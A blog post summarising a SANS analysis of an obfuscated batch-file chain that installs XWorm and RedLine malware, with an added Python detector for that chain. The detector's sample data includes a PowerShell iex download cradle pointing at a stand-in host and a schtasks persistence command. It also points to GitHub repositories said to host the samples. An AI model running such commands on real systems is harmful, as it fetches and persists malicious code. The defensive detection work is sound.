The Wiert Corner – irregular stream of stuff

Jeroen W. Pluimers on .NET, C#, Delphi, databases, and personal interests


The state of malware today: From Highly Obfuscated Batch File to XWorm and Redline – SANS Internet Storm Center

Posted by jpluimers on 2024/10/10

A very interesting read that keeps me wondering how batch files like these are generated (making them by hand feels very surreal): [Wayback/Archive] From Highly Obfuscated Batch File to XWorm and Redline – SANS Internet Storm Center

VirusTotal entry: [Wayback/Archive] VirusTotal – File – 453c017e02e6ce747d605081ad78bf210b3d0004a056d1f65dd1f21c9bf13a9a

The day after the article was written, only Kaspersky and ZoneAlarm detected it; in the past ZoneAlarm used the Kaspersky engine, but that stopped a while ago: [Wayback/Archive] ZoneAlarm Free Antivirus Review | PCMag.

The malware uses at least these technologies:

  • obfuscation (not just by presenting the file in a wrong text encoding, but also by using both empty and calculated environment variables, plus many loop + GOTO tricks)
  • batch files
  • mshta
  • wscript (using WScript.Shell to execute batch files)
  • conhost (as conhost.exe 0xffffffff -ForceV1, indicating a session-less conhost)
  • doskey
  • net session and net1 session to check for administrative permissions
  • powershell (using Start-Process to execute batch files, and iex (Invoke-Expression) to run a script which downloads other scripts and runs them)
  • it is not clear whether ctfmon is used, and if so, whether this involves vulnerabilities in the undocumented CTF (Common Text Framework) protocol or a malware program carrying the ctfmon.exe name
  • rundll32
  • python (downloaded dynamically) to download a script which embeds an also-downloaded payload into any 32-bit Windows process using various kernel32 techniques and the Task Scheduler, via:
  • schtasks

Finally, it downloads the RedLine and XWorm malware.
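As an added example (not code from the SANS article or from this post), here is a small Python detector that turns the process chain listed above into rules and runs them over constructed Sysmon-style process-creation records; the event field names, rule names, sample paths and the example.invalid URL are all assumptions.

```python
import re

# Constructed sample of process-creation events (Sysmon event 1 style); the
# parent/image/command-line values are made up to mirror the chain described above.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\Downloads\invoice.bat"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\net1.exe",
     "cmdline": "net1 session"},
    {"parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\u\AppData\Local\Temp\x.bat"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iex (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/a.ps1')\""},
    {"parent": r"C:\Users\u\AppData\Local\Temp\python.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 5 /tn Updater /tr "C:\Users\u\AppData\Local\Temp\run.bat"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

# Each rule: (name, regex over the command line, optional regex over the parent image).
RULES = [
    ("sessionless conhost (0xffffffff -ForceV1)",
     re.compile(r"conhost\.exe\s+0xffffffff\s+-ForceV1", re.I), None),
    ("admin check via net/net1 session", re.compile(r"\bnet1?\s+session\b", re.I), None),
    ("wscript launching a batch file", re.compile(r"\.bat\b", re.I),
     re.compile(r"wscript\.exe$", re.I)),
    ("powershell iex download cradle",
     re.compile(r"\biex\b.*DownloadString|DownloadString.*\biex\b", re.I), None),
    ("schtasks persistence from a temp-dir interpreter",
     re.compile(r"schtasks(\.exe)?\s+/create", re.I), re.compile(r"\\Temp\\", re.I)),
]

def match_event(event):
    """Return the names of all rules this event triggers (empty list if none)."""
    return [name for name, cmd_re, parent_re in RULES
            if cmd_re.search(event["cmdline"])
            and (parent_re is None or parent_re.search(event["parent"]))]

def scan(events):
    """Map each matching event's command line to the rule names it triggered."""
    return {e["cmdline"]: hits for e in events if (hits := match_event(e))}

if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS).items():
        print(cmdline, "->", hits)
```

The parent-process condition is what separates the wscript and schtasks rules from benign use of the same binaries; tune the rules to your own telemetry before relying on them.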

Via: [Wayback/Archive] SANS.edu Internet Storm Center on X: “From Highly Obfuscated Batch File to XWorm and Redline …”

Related:

Queries:

Archived malware files by [Wayback/Archive] LoneNone1807 · GitHub in [Wayback/Archive] GitHub – LoneNone1807/martin and [Wayback/Archive] GitHub – LoneNone1807/RedAV (I hope that by now either the user or the repositories – more at [Wayback/Archive] LoneNone1807 (LoneNone1807) / Repositories · GitHub – are gone), in the order of the above SANS blog post:

These were not included in the SANS blog post:

Repository not mentioned or (indirectly) referenced from the SANS blog post:

Links inside the repositories:

Note the GitHub user did not have any public gists at the time of writing: [Wayback/Archive] LoneNone1807’s gists · GitHub

--jeroen
